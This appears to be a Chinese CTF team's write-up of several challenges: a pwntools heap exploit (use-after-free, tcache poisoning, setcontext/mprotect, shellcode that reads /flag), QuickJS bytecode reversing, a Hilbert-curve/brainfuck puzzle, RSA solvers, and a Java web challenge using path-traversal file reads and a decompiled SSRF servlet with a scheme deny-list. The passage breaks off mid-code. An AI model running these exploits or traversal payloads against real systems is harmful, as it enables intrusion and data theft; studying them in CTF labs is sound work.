注:本文为goodcat战队参赛wp,非官方出品
libc 2.27-0ubuntu1.4,程序存在明显的 UAF(delete 后 index 仍然保留指针,依旧可以对已释放的 chunk 进行 edit/show);
tcache double free 控制 tcache_perthread_struct,将 counts[] 数组全部填满(让每个 bin 看起来都已满)后再释放该结构体,它会进入 unsortedbin,从而泄露 libc;
之后再次利用 UAF 做 tcache poisoning,把 __free_hook 改为 setcontext+53,借 mprotect 把 __free_hook 所在页改成可执行,再布置 orw shellcode 读出 flag。
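from pwn import *

context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"
context.terminal = ["tmux", "splitw", "-h"]

# r = process("./pwn2")
r = remote("47.104.175.110", 61608)
libc = ELF("./libc.so.6")

PAGE_MASK = 0xFFFFFFFFFFFFF000  # drop the low 12 bits of a leaked pointer


def allocate(index, size):
    """Menu 1: malloc(size) and store the pointer in slot `index`."""
    r.sendlineafter(b">> \n", b"1")
    r.sendlineafter(b"input index:\n", str(index).encode())
    r.sendlineafter(b"input size:\n", str(size).encode())


def delete(index):
    """Menu 2: free slot `index`.

    The program keeps the dangling pointer, so edit()/show() still work on the
    freed chunk -- that UAF is the primitive the whole exploit is built on.
    """
    r.sendlineafter(b">> \n", b"2")
    r.sendlineafter(b"input index:\n", str(index).encode())


def edit(index, content):
    """Menu 3: write `content` (bytes, sent raw, no trailing newline) into slot `index`."""
    r.sendlineafter(b">> \n", b"3")
    r.sendlineafter(b"input index:\n", str(index).encode())
    r.sendafter(b"input context:\n", content)


def show(index):
    """Menu 4: print slot `index`; the caller reads the leaked bytes afterwards."""
    r.sendlineafter(b">> \n", b"4")
    r.sendlineafter(b"input index:\n", str(index).encode())


# --- stage 1: heap leak, then take over tcache_perthread_struct ---------------
# Heap grooming: presumably shapes the heap so the chunks allocated later land
# where the setcontext frame below expects them.
for _ in range(8):
    allocate(0, 0x10)
allocate(0, 0x40)
for _ in range(7):
    allocate(0, 0x60)
allocate(0, 0x60)

delete(0)
# Overwrite the first 0x10 bytes of the freed chunk (tcache `next` + `key`) so
# the double-free check of this libc build does not fire, then free it again.
edit(0, b"a" * 0x10)
delete(0)
show(0)
# The chunk's tcache `next` field is now a heap pointer.  recvn() insists on all
# six bytes; recv(6) could return fewer on a fragmented TCP read.
heap_addr = u64(r.recvn(6) + b"\x00\x00") & PAGE_MASK
print("heap_addr = " + hex(heap_addr))

# Tcache poisoning: point `next` at the tcache_perthread_struct, which sits at
# heap base + 0x10 (just past its chunk header).
edit(0, p64(heap_addr + 0x10))
allocate(0, 0x60)
allocate(0, 0x60)  # the second allocation returns the tcache struct itself
# Fill counts[] with 0x61 so every bin looks full; freeing the struct chunk then
# bypasses tcache and lands it in the unsortedbin, whose fd/bk point into
# main_arena.
edit(0, b"a" * 64)
delete(0)
show(0)
arena_leak = u64(r.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
# Relies on main_arena and __malloc_hook sharing a page in this libc: the
# page-aligned leak plus the hook's low 12 bits gives __malloc_hook.
malloc_hook = (arena_leak & PAGE_MASK) + (libc.sym["__malloc_hook"] & 0xFFF)
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.symbols["setcontext"]
mprotect = libc_base + libc.sym["mprotect"]
print("libc_base = " + hex(libc_base))
print("mprotect = " + hex(mprotect))

# --- stage 2: reset tcache counts, poison a bin onto __free_hook --------------
allocate(0, 0x58)        # carved from the unsorted struct chunk (start of the tcache struct)
edit(0, b"\x00" * 0x58)  # zero the inflated counts[] so tcache behaves normally again
allocate(1, 0x38)
delete(1)
edit(1, p64(free_hook))  # UAF again: `next` -> __free_hook
allocate(1, 0x38)
allocate(1, 0x38)        # slot 1 now points at __free_hook
for _ in range(4):
    allocate(2, 0x30)
allocate(3, 0x10)
allocate(4, 0x30)
allocate(5, 0x30)

# --- stage 3: free -> setcontext+53 -> mprotect(RWX) -> stage-2 shellcode ------
new_addr = free_hook & PAGE_MASK  # the page that holds __free_hook
# Stage-1 shellcode: read(0, new_addr, 0x1000) and jump to whatever was read.
shellcode1 = """
    xor rdi,rdi
    mov rsi,%d
    mov edx,0x1000
    mov eax,0
    syscall
    jmp rsi
""" % new_addr

# __free_hook      : setcontext+53
# __free_hook+0x08 : address of shellcode1 (popped by the `ret` after mprotect)
# __free_hook+0x10 : shellcode1
edit(1, p64(set_context + 53) + p64(free_hook + 0x10) + asm(shellcode1))
# setcontext+53 loads registers from fixed offsets off rdi, and rdi is the
# pointer being freed (slot 2).  Chunks 4 and 5 are laid out so those offsets
# yield rdi=new_addr, rsi=0x1000, rdx=7, rsp=__free_hook+8, rcx=mprotect
# (pushed, then `ret` into): mprotect(new_addr, 0x1000, RWX), after which the
# next `ret` lands in shellcode1.
edit(4, p64(0) + p64(new_addr) + p64(0x1000) + p64(0) + p64(0) + p64(7))
edit(5, p64(free_hook + 0x8) + p64(mprotect))
delete(2)  # free(slot 2) -> __free_hook -> the chain above

sleep(0.5)  # give shellcode1 time to reach its read() before the payload arrives
# Stage-2 shellcode: open("/flag") / read / write(1, ...) / exit.
shellcode2 = """
    mov rax, 0x67616c662f ;// /flag
    push rax
    mov rdi, rsp ;// /flag
    mov rsi, 0 ;// O_RDONLY
    xor rdx, rdx ;
    mov rax, 2 ;// SYS_open
    syscall
    mov rdi, rax ;// fd
    mov rsi,rsp ;
    mov rdx, 1024 ;// nbytes
    mov rax,0 ;// SYS_read
    syscall
    mov rdi, 1 ;// fd
    mov rsi, rsp ;// buf
    mov rdx, rax ;// count
    mov rax, 1 ;// SYS_write
    syscall
    mov rdi, 0 ;// error_code
    mov rax, 60
    syscall
"""
r.sendline(asm(shellcode2))
r.interactive()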
find the cmp str.
buu原题
hook原文
将原文转成qword
与加密key相加得到flag
flag{a14a424005b14e2b89ed45031ea791b9}
根据题目名称,发现是一道js框架的题目
0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02, 0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02, 0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63, 0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31, 0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61, 0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61, 0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78, 0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75, 0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75, 0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01, 0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00, 0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x3F, 
0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E, 0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00, 0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4, 0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0, 0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1, 0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF, 0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9, 0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00, 0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C, 0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00, 0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF, 0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21, 0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00, 0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11, 0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00, 0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00, 0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00, 0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A, 0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00, 0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00, 0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 
0x00, 0x93, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB, 0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC, 0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC, 0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00, 0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00, 0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1, 0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE, 0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF, 0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A, 0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B, 0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A, 0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB, 0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00, 0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00, 0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00, 0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00, 0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01, 0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7, 0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C, 0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8, 0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95, 0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 
0x00, 0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC, 0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01, 0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72, 0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A, 0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00, 0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01, 0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE, 0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30, 0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40, 0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5, 0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8, 0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE, 0x0A, 0x28, 0x01, 0xFE, 0x00, 0x00, 0x00
参考了这一篇博客
https://bbs.pediy.com/thread-259014.htm
对 quickjs.c 进行 patch:
得到字节码如下,对dump出来的字节码进行分析,提取出密文
[150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 64, 106, 103, 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 107, 131, 223, 122, 229, 157]
再提取出加密过程如下:
RC4_KEY="2021quickjs_happygame" push_i16 150 push_i16 224 push_i16 244 push_i8 68 push_i8 61 push_i8 125 push_i8 8 push_i16 239 push_i16 203 push_i16 254 push_i16 241 push_i8 113 push_i16 213 push_i16 176 push_i8 64 push_i8 106 push_i8 103 push_i16 166 push_i16 185 push_i16 159 push_i16 158 push_i16 172 push_i8 9 push_i16 213 push_i16 239 push_i8 12 push_i8 100 push_i16 185 push_i8 90 push_i16 174 push_i8 107 push_i16 131 array_from 32 push_i16 223 define_field "32" push_i8 122 define_field "33" push_i16 229 define_field "34" push_i16 157 43 define_field "35"
解密得到flag为flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}
binwalk提取两张图片,分别得到一个字母数字混合的表格和一个hint.txt
password.xls
hint.txt
希尔伯特曲线(Hilbert curve)。取出表格中的字符,单独放到 password.txt 文件中,运行脚本如下:
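import base64

from hilbertcurve.hilbertcurve import HilbertCurve

GRID = 256        # the table is 256 x 256 characters
ORDER = 8         # Hilbert curve order: 2**8 = 256 cells per side
DIMS = 2
B64_LAYERS = 25   # the recovered string is base64-encoded 25 times over

curve = HilbertCurve(ORDER, DIMS)

# password.txt is the table dumped as UTF-16 text, one row per line with
# tab-separated cells (apparently an export of password.xls); strip the tabs so
# each row becomes a 256-character string.
rows = []
with open("password.txt", "r", encoding="utf-16") as fh:
    for _ in range(GRID):
        rows.append(fh.readline().replace("\t", "").replace("\n", ""))

# Walk the curve: distance d -> (x, y); the table is indexed as rows[y][x].
# Loop variables are named x/y so they do not shadow the curve parameters.
chars = []
for dist in range(GRID * GRID):
    x, y = curve.point_from_distance(dist)
    chars.append(rows[y][x])
password = "".join(chars)

# Peel off the nested base64 layers.
blob = password
for _ in range(B64_LAYERS):
    blob = base64.b64decode(blob)
print(blob)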
得到base64加密后的密文如下:
base解密得到密码
解压后发现里面是brainfuck
>+++++++++[<+++++++++++++ >-]>+ ++[< +++++++++++++++++++++++++++++
++++++++>-]>++[<+++++++++ +++++ ++++++ +++++++++++++++++++++++++++++
++++++++++++>-]>++++[<+++ +++++ ++++++++ +++++++++++++>-]>+++[<+++++++
+++++ +++++ ++++ ++++ +++++
+++++ +++++ +>-] ++++ +++++
+++++ +++++ ++++ ++++ +++++
+++++ +++++ ++++ ++++ +++++
+++++ +++++ ++++ ++++ +++++
+++++ >>+++ +++[ <+++ +++++
+++++ +++++ +>-] >++[ <++++
+++++++++++++++++++++++++ +++++ +++++++>-]>+++++++++++[< +++++ ++++++>-]>++[<++
+++++++++++++++++++++++++ +++++ ++++++++++++++++++++++++++ +>-]> +++++++[<++++++++
+++++++>-]+++++++++++++++ +++++ ++++++++++++++++++++++++++++ +++++ +++ +++++
+++++ +++++ ++++ ++++ +++++ +++++
+++++ +++++ ++++ >>++ +++[< +++++
+++++ +++++ ++++ >-]> +++++ +++[<
+++++ +++++ +>-] >+++ +++[< +++++
+++++ +++++ ++>- ]>++ +++++ [<+++
+++++ +++++ ++>- ]+++ +++++ +++++
+++++ +++++++++++++++++++++++++++ ++++ ++++ +++++++++++++++++++++++++++++
+++++ ++++++++++++++>>++[<+++++++ ++++ ++++ +++++++++++++++++++++++++++++
+++++ ++++++++++>-]>+++++[<++++++ ++++ ++++ +++++>-]>+++++++[<+++++++>-]>
++++ ++++
[<+++ +++++
+>-]>+++++[<+++++++++++++++++++>-]>++++[<+++++++++++++>-]>+++++[<+++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++++++[<
++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>+++++++[<+++++++++++++++++>-
]>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]>+++++++[<+++++++++++++++>-]>+++++++++[<+++++++++++++>-]>++++++[<+++++++++++++++++
>-]>+++[<+++++++++++>-]>+++++[<+++++++++++++++++++>-]>++++++++++[<++++++++++++>-]>++++++[<+++++++++++++++++>-]>+++++++[<+++++++++++++++>-]++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++>-]>+++++[<+++++++++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.>>+++
+++[<+++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>>+++[<+++++++++++++++++++++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>
运行上面的 brainfuck 程序,输出如下:
uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}
放到编码器里面发现是atbash
对应位置修改下大小写
flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}
to small? leak?
https://blog.cryptohack.org/cryptoctf2020#one-line-crypto
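from Crypto.Util.number import long_to_bytes
from gmpy2 import invert, is_prime
from tqdm import tqdm

E = 0x10001
# Challenge ciphertext; n is not given, both factors come from candidate_primes().
C = 15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311


def candidate_primes(limit=500, max_bits=2048):
    """Collect primes of the form xy**(mn + 1) - (xy + 1)**mn.

    xy and mn both range over [0, limit).  For a fixed xy the inner loop stops
    once the value exceeds max_bits, since a factor of a 2048-bit n cannot be
    larger than that.  Values <= 1 are skipped: gmpy2's is_prime() may accept
    |x| of a negative x, and such values can never be RSA factors.
    """
    primes = []
    for xy in tqdm(range(limit)):
        for mn in range(limit):
            cand = xy ** (mn + 1) - (xy + 1) ** mn
            if cand.bit_length() > max_bits:
                break
            if cand > 1 and is_prime(cand):
                primes.append(cand)
    return primes


def try_decrypt(primes, c=C, e=E, bits=2048):
    """Try every pair (p, q) from `primes` whose product is exactly `bits` bits.

    Prints and returns every plaintext containing b"flag{" (empty list if none).
    Pairs where e is not invertible mod phi are skipped: gmpy2.invert() raises
    ZeroDivisionError in that case (ValueError kept for older gmpy2 builds).
    """
    found = []
    for i, p in enumerate(primes):
        for q in primes[i:]:
            n = p * q
            if n.bit_length() != bits:
                continue
            try:
                d = invert(e, (p - 1) * (q - 1))
            except (ValueError, ZeroDivisionError):
                continue
            dec = long_to_bytes(pow(c, d, n))
            if b"flag{" in dec:
                print(dec)
                found.append(dec)
    return found


if __name__ == "__main__":
    try_decrypt(candidate_primes())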
已知((fac[0]+fac[1]+fac[2]) << 1) - 1的值,用其替代n。分解((fac[0]+fac[1]+fac[2]) << 1) - 1求其欧拉函数,进而求解出d和第二段。
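import gmpy2
from Crypto.Util.number import *


def main():
    """Decrypt the second ciphertext.

    `_n` is the known value ((fac[0] + fac[1] + fac[2]) << 1) - 1, used in place
    of the modulus (see the note above).  Its prime factorisation is listed in
    FACTORS; phi(_n) is the product of (f - 1), from which d follows.  The
    factor list is multiplied back first so a mistyped factor fails loudly
    instead of producing garbage.
    """
    _n = 39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557011554851873068389016629085963086136116425352535902598378739
    e = 0x10001
    c = 40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083
    FACTORS = [
        191,
        193,
        627383,
        1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491,
    ]

    product = 1
    for f in FACTORS:
        product *= f
    if product != _n:
        raise ValueError("FACTORS does not multiply back to _n")

    phi_n = 1
    for f in FACTORS:
        phi_n *= f - 1
    d = gmpy2.invert(e, phi_n)
    # c is reduced mod _n first because the original ciphertext is larger than _n.
    m = pow(c % _n, d, _n)
    print(long_to_bytes(m))


if __name__ == "__main__":
    main()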
###
一道Java_URL。
Tomcat/8.5.71
http://eci-2zeb5ty7ty8rr8c0v8yy.cloudeci1.ichunqiu.com/
读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF//web.xml
<?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0"> <servlet> <servlet-name>testurl</servlet-name> <servlet-class>com.test2.aaa1.testURL</servlet-class> </servlet> <servlet-mapping> <servlet-name>testurl</servlet-name> <url-pattern>/testURL</url-pattern> </servlet-mapping> <servlet> <servlet-name>download</servlet-name> <servlet-class>com.test2.aaa1.download</servlet-class> </servlet> <servlet-mapping> <servlet-name>download</servlet-name> <url-pattern>/download</url-pattern> </servlet-mapping> </web-app>
读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/testURL.class
得到class文件
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Decompiled /testURL servlet (com.test2.aaa1.testURL), recovered through the
 * path-traversal read shown above.  It fetches an attacker-supplied URL
 * server-side and echoes the response body back: an SSRF primitive guarded only
 * by a scheme deny-list.
 */
public class testURL extends HttpServlet {
    protected void doGet(HttpServletRequest arg1, HttpServletResponse arg2) throws ServletException, IOException {
        // GET is handled exactly like POST.
        this.doPost(arg1, arg2);
    }

    protected void doPost(HttpServletRequest arg6, HttpServletResponse arg7) throws ServletException, IOException {
        String tartget_url = arg6.getParameter("url");
        // Scheme check: the text before the first ':' must not be file/gopher/data
        // (case-insensitive; matches() anchors the whole substring).  Any other
        // scheme the JDK URL handlers support (http, https, ftp, jar, ...) passes.
        // A missing "url" parameter -> NullPointerException; no ':' in the value ->
        // indexOf() returns -1 and substring() throws StringIndexOutOfBoundsException.
        if(tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
            arg7.getWriter().write(String.valueOf(new StringBuilder().append("false")));
            return;
        }
        // The fetched content is written back verbatim, so the SSRF is fully readable.
        arg7.getWriter().write(String.valueOf(this.getContent(tartget_url)));
    }

    public StringBuilder getContent(String arg8) throws IOException {
        // openConnection() with no host/port restriction and no timeout; the reader
